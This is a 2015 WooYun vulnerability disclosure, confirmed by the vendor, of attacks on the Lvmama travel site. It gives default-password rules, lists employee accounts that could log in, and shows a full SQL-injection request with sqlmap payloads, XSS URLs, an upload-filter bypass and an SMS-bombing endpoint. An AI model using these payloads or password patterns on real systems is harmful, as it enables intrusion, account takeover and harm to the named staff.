当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145223

漏洞标题:看我尝试利用过往漏洞信息对驴妈妈旅游网打一次无聊体验(OA/企业邮箱/EKP系统/XSS)

相关厂商:驴妈妈旅游网

漏洞作者: Xmyth_Xi2oMin9

提交时间:2015-10-07 23:02

修复时间:2015-11-22 10:58

公开时间:2015-11-22 10:58

漏洞类型:内部绝密信息泄漏

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-07: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-18: 细节向核心白帽子及相关领域专家公开
2015-10-28: 细节向普通白帽子公开
2015-11-07: 细节向实习白帽子公开
2015-11-22: 细节向公众公开

简要描述:

RT 习惯性分享有趣的事情 这篇东西有点长 :)

详细说明:

一直很喜欢驴妈妈,这次提交漏洞算是通过整理和收集过往的漏洞信息,通过分析引起的一个蝴蝶效应,没用到什么高大上的技术,主要是不断的调整思路,逐个突破。
过往漏洞中有用的信息:

EKP系统:http://ekp.joyu.com/login.jsp
突破口:账号为名字拼音,密码为1。


通过信息收集到的用户名,进行碰撞得到下面这些可以登录的用户:

wangqian
zhangli
liwei
lijing
zhangli
limin	
wangjie
liuyan
liuyong
liujing
yangyong
zhangli
zhangyu	
zhangying
liudan
liuyan
lixue
wangting
liting
zhangying
liuping
wangyu
liuping	
huangwei
lijing
zhangyu
zhangying
lirong
sunwei
zhangyu
zhoujing

111.png

333.png


在EKP系统中能够获取到很多企业内部平时的信息,并且在EKP中还有一个提供给员工交流的论坛。经过测试发现BBS存在XSS漏洞,为了不影响系统正常运行仅仅测试了就把XSSCODE删除了。

41.png


然后对内部资料进行一个简单的信息收集,发现了企业内部邮件系统更换的重要通知。

555.png


整理下收集到的信息,邮箱在更换后密码的默认重置规则都是统一的,那么我们就可以通过之前收集的邮箱进行一个碰撞。
规则:

joyu2015+邮箱账号前缀去掉第一个字母
zhangsan@joyu.com -> joyu2015hangsan  
lisi@lvmama.com的 -> joyu2015isi


经过碰撞,进一步控制了一部分邮箱。其中有客服部、产品部、公关部等等。

service@lvmama.com   客服邮箱
ad@lvmama.com  产品部产品审核专用
ggb@lvmama.com 公关部

lvmama_mail4.jpg


通过邮件发现关于OA系统的邮件,用户名为员工的姓名,密码为111111。

oa.png

这里的思路也是撞库,因为之前通过搜索引擎和EKP系统中的论坛中收集到了很多员工姓名,一个脚本就可以处理好这些搜集来的员工姓名。

53.png

这里撞库需要注意的是我们需要对碰撞的字典中的用户姓名都进行URL编码再去碰撞,于是又进一步控制一部分员工的OA账号。

oa-1.png

oa-2.png


到这里可能按照以往的思路都是找VPN,但是在翻查资料的过程中并没有发现。又观察了驴妈妈一段时间,发现驴妈妈的DZ论坛估计是个突破口。按照前辈的思路是收集管理员账号,经过搜索引擎整理了论坛的管理员账号。
管理员:

一夜知秋08
驴妈妈旅游点评频道
bbs_manager
小驴一枚
qqkj


当时想了很久应该怎么获取这些管理员的密码,如果单纯撞库好像不行了,因为主站限制了频率,某些分站之前漏洞也修复了加了验证码。于是思考了一下,发现在整理的资料里发现驴妈妈是景域下的一家公司,并且还有另一家帐篷客也是景域的。而最关键的帐篷客是通过驴妈妈的账号登录,并且帐篷客在登录方面安全性低很多。
撞库突破口:

帐篷客:http://m.campsort.com/
问题:验证码可以重复使用,username和password没有加密。
- - - - - - - - - - - - - - - - - - - - - - - -
分销平台:http://fenxiao.lvmama.com/
问题:验证码可以重复使用,username和password没有加密,但是限制了频率,这个有个有趣的地方就是这个平台登录时如果用户不存在会告诉我们,可以利用测试我们之前收集的用户是否存在。
- - - - - - - - - - - - - - - - - - - - - - - -
无线端:http://m.lvmama.com/clutter/login.htm#
问题:验证码可以重复使用,username和password都是base64加密。

21.png

22.png


大致的思路就是这样,在这段时间还发现了一些其他的问题。接下来的事情就比较简单了,只是时间的问题。
短信轰炸接口:

机票预订网:http://flight.lvmama.com/findorder.php


可能你会问我这漏洞有什么用?在整个过程中,是打算测试用户找回密码那块的,如果只是单纯的测试找回功能可能会让用户有所察觉,所以考虑在测试找回密码的过程中配合这个漏洞发恶意的验证码,将找回密码的短信埋没掉。后来觉得这样欠妥就没配合这个漏洞利用了!
注入漏洞:

POST /others/Extreme/manage.php HTTP/1.1
Host: www.lvmama.com
Proxy-Connection: keep-alive
Content-Length: 82
Accept: */*
Origin: http://www.lvmama.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.lvmama.com/zt/abroad/lundun-online.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: uid=wKgKb1YSECwdzERPkKwJAg==; lvsessionid=44e6f058-7653-480e-9c47-9e8d7faabdd0_19534896; orderFromChannel=menpiaopingdao_cpc_weibo; 
CoreID6=76324013867414440243655&ci=90409730; ip_from_place_id=1; ip_from_place_name=%E5%8C%97%E4%BA%AC; ip_area_location=BJ; ip_location=114.252.71.250; 
ip_province_place_id=110000; ip_city_place_id=110000; ip_city_name=%E5%8C%97%E4%BA%AC; _lvTrack_UUID=B4AE4D52-729A-4F66-9523-07C33491DCDD; 
PHPSESSID=hkhkkf4bcqb759lkem0avcq5m3; JSESSIONID=527D7A1AF3418D90B1D7B7CBD1D93C8B; cmTPSet=Y; __xsptplus443=443.2.1444035007.1444035009.2%233%7Cweibo.com%7C%7C%7C%7C
%23%23C5c5GrxEOgu4f0lGxn8PFjNYVlBMDT3Q%23; Rvyz72RO3yiChuCn=aVk7aBK09t4WM5Fc%2FlBxMyTn1if6M9OPDB84c
%2FwtHzb7fIbNhsqFH34cAI3Nbp1uJYQ4zErW5TkGUJRcbzAnYX9IAdmcMwrBUDYerUqiVyHe2D3z9Zw3CfWzYwbKnpPwOTOpY6uB
%2FN9DfiMeYO3gDBPPeNfsU2%2Bd4w79t8D986eKhqPfBXJcQkbUPEz8CEi693iHLSV5GUeACddXCy0yy1YyzEmdzv%2FFcwHA3MFxwF9sJ27YE29TY29bZ1UyD1fhMlYiyPerrmCf
%2FyGAn30BpLaNOGBkZLprLI1urElBNKdiN2gV66YKvWlr28Cvwif2W597k49lnN9Y51jdh8ba%2BwrmpALt3vrvT%2F2aqE23ylPp%2BTS5LZaTiIEGlM1UMn3m6V2poO07dlucMDCEafJDSEKJ%2FglbsUI8vYZR7KyT
%2FLQn0pKyf3tbTLthnk%2Fgo8LKE99kJ5PbOE%2BW6dGyp%2Fux%2FA%3D%3Dd30016226d91f0fc288306536d47ae97b3c4ca4e; oUC=018115; oUT=0905; 90409730_clogin=v=1&l=1444035007&e=1444036914160; 
Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1444024366,1444024452,1444035114; Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1444036618; 
__utma=30114658.561391793.1444024366.1444035009.1444035114.3; __utmb=30114658.4.10.1444035114; __utmc=30114658; __utmz=30114658.1444035114.3.2.utmcsr=baidu|utmccn=(organic)|
utmcmd=organic; jiathis_rdc=%7B%22http%3A//www.lvmama.com/zt/abroad/lundun-online.html%22%3A%2221%7C1444036618347%22%7D; bfd_s=30114658.61726892.1444035009894; 
tmc=5.30114658.34703941.1444035009903.1444035211152.1444036618370; tma=30114658.59324709.1444024366382.1444024366382.1444024366382.1; tmd=10.30114658.59324709.1444024366382.; 
bfd_g=8d94ecf4bbcd4738000026900000d3a75612102e
state=add&u=dasd&g=M&m=13800138000&e=12315@qq.com&n=1&d=2015-10-15&productid=46469


测试结果:

Parameter: u (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: state=add&u=dasd' RLIKE (SELECT (CASE WHEN (9886=9886) THEN 0x64617364 ELSE 0x28 END)) AND 'HJQB'='HJQB&g=M&m=13800138000&e=12315@qq.com&n=1&d=2015-10-15&productid=46469
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: state=add&u=dasd' AND EXTRACTVALUE(6253,CONCAT(0x5c,0x716b6a7a71,(SELECT (ELT(6253=6253,1))),0x71786a6271)) AND 'fVgS'='fVgS&g=M&m=13800138000&e=12315@qq.com&n=1&d=2015-10-15&productid=46469
---
[17:21:32] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.1


本来想通过注入漏洞来获取用户密码的信息的,后来发现这样的工作量太大了。而且这个注入漏洞好像并不能爆出数据就搁在一边了。
XSS漏洞(过了<script和</script>等等):

http://flight.lvmama.com/error.php?message=xsscode

412.png

XSS在整个思路里主要是考虑打管理员cookie,但是在整个过程中发现并不能很好的与管理员联系上,一般的用户cookie并不在这次测试的目的中,如果需要的话,只要混进驴妈妈粉丝群里发一个链接就可以了。

5555.png

漏洞证明:

最后想了下,还有上传漏洞:

用户攻略:http://www.lvmama.com/guide/create.php?activeid=0


图片上传处只允许图片格式的文件上传,;绕过就可以了。

666.png


测试:http://iguide.lvmama.com//uploadfile/2015/1005/201510052116136756.txt


没有拿shell,没有做什么破坏,感恩!

修复方案:

打字打的辛苦 分享快乐 第一道雷是不是驴妈妈的呢? :-)

版权声明:转载请注明来源 Xmyth_Xi2oMin9@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-08 10:57

厂商回复:

thx

最新状态:

暂无